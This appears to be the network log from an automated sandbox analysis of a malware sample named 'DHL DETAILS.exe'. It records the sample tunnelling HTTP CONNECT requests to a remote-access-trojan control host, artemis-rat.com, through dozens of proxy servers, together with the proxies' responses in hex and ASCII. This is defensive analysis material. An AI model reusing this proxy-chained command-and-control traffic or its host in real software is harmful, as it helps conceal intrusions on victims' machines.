                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    456192.168.2.550372174.77.111.19641456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.913563967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    457192.168.2.55137149.228.131.16950006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.913598061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    458192.168.2.551379193.239.58.9280816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.913830996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    459192.168.2.55142498.162.25.4316546352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.914067030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    460192.168.2.55136537.156.146.16331286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.914308071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.692461014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.950427055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.248996973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.924870968 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    461192.168.2.551375190.128.228.182806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.914376020 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:14.629370928 CET1286INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Server: Apache/2.4.56 (Ubuntu)
                                                                                    Set-Cookie: PHPSESSID=tdh0qj5hpm21ekvpbug0bv7d11; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    Vary: Accept-Encoding
                                                                                    Content-Length: 5101
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 69 6d 67 2f 66 75 74 75 72 61 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 55 54 55 52 41 31 30 30 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 20 46 6f 6e 74 66 61 63 65 73 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 66 6f 6e 74 2d 66 61 63 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2d 35 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 6d 64 69 2d 66 6f 6e 74 2f 63 73 73 2f 6d 61 74 65 72 69 61 6c 2d 64 65 73 69 67 6e 2d 69 63 6f 6e 69 63 2d 66 6f 6e 74 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 6c 69 62 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 0d 0a 3c 21 2d 2d 20 63 6f 64 69 67 6f 73 20 43 53 53 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 61 6e 69 6d 73 69 74 69 6f 6e 2f 61 6e 69 6d 73 69 74 69 6f 6e 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <link rel="icon" href="static/src/img/futura.png"> <title>FUTURA100</title><link href="css/style.css" rel="stylesheet" media="all">... Fontfaces CSS--><link href="css/font-face.css" rel="stylesheet" media="all"><link href="codigos/font-awesome-5/css/fontawesome-all.min.css" rel="stylesheet" media="all">...<link href="codigos/mdi-font/css/material-design-iconic-font.min.css" rel="stylesheet" media="all">-->... Bootstrap CSS--><link href="static/lib/css/bootstrap/bootstrap.css" rel="stylesheet" media="all">... codigos CSS<link href="codigos/animsition/animsition.min.css" rel="stylesheet" media="all"><link href="codigos/perfect-scrollbar/perfect-scrollbar.css" rel="stylesheet" media="all">-->...
                                                                                    Mar 9, 2024 13:14:14.629487991 CET1286INData Raw: 20 4d 61 69 6e 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 74 6f 75 72 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22
                                                                                    Data Ascii: Main CSS--><link href="css/bootstrap-tour.min.css" rel="stylesheet" media="all"><link href="css/bootstrap-tour-standalone.css" rel="stylesheet" media="all"><link href="css/theme.css" rel="stylesheet" media="all"><link rel="stylesh
                                                                                    Mar 9, 2024 13:14:14.629636049 CET1286INData Raw: 74 72 61 70 2d 74 6f 75 72 2d 30 2e 31 32 2e 30 2f 72 65 74 69 6e 61 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63
                                                                                    Data Ascii: trap-tour-0.12.0/retina.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/xlsx/0.18.5/xlsx.full.min.js" integrity="sha512-r22gChDnGvBylk90+2e/ycr3RVrDi8DIOkIGNhJlKfuyQM4tIRAI062MaV8sfjQKYVGjOBaZBOA87z+IhZE9DA==" crossorigi
                                                                                    Mar 9, 2024 13:14:14.629762888 CET1286INData Raw: 69 c3 b3 6e 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e
                                                                                    Data Ascii: in</button> </div> </div> </div> </div> <div class="p-3 d-flex justify-content-center mt-5" style="background-color: rgba(0, 0, 0, -0.9);width: 400px; margin-left:auto;margin-r
                                                                                    Mar 9, 2024 13:14:14.629801989 CET298INData Raw: 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6c 6f 67 69
                                                                                    Data Ascii: <script src="static/src/js/main.js"></script> <script src="static/src/js/login.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootstrap-tour.min.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootst
                                                                                    Mar 9, 2024 13:14:14.633107901 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 95 b0 7d 9c aa 21 c0 e4 73 b9 58 52 3e f7 1e e5 b4 60 86 e4 1d 22 64 76 61 d7 a3 28 b6 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eR}!sXR>`"dva(*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:14.988686085 CET494INHTTP/1.1 400 Bad Request
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Server: Apache/2.4.56 (Ubuntu)
                                                                                    Content-Length: 312
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 67 72 2e 66 75 74 75 72 61 31 30 30 2e 63 6f 6d 2e 70 79 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Ubuntu) Server at agr.futura100.com.py Port 80</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    462192.168.2.551325124.163.236.5473026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.914513111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.364940882 CET90INHTTP/1.1 200 OK
                                                                                    Content-Type: application/json
                                                                                    Connection: close
                                                                                    Content-Length: 55


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    463192.168.2.55146564.227.106.157806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.183240891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.354180098 CET327INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    464192.168.2.551444162.243.102.20797646352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.183671951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    465192.168.2.55039172.195.34.5941456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.183753967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    466192.168.2.550314103.121.39.15810806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.208842039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    467192.168.2.55044670.166.167.55577456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.218822956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    468192.168.2.551389103.190.54.14180806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.219269037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    469192.168.2.55142039.108.227.108806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.220566988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.561958075 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    470192.168.2.55145220.210.113.3281236352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.223321915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.490892887 CET319INHTTP/1.1 403 Forbidden
                                                                                    Server: squid
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 17
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    X-Cache: MISS from cdn-fintech.info
                                                                                    X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                    Data Ascii: ERR_ACCESS_DENIED


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    471192.168.2.551436193.239.56.8480816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.223458052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    472192.168.2.551518104.19.233.117806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.226155043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.380947113 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    473192.168.2.55146972.49.49.11310346352C:\Users\user\Desktop\DHL DETAILS.exe
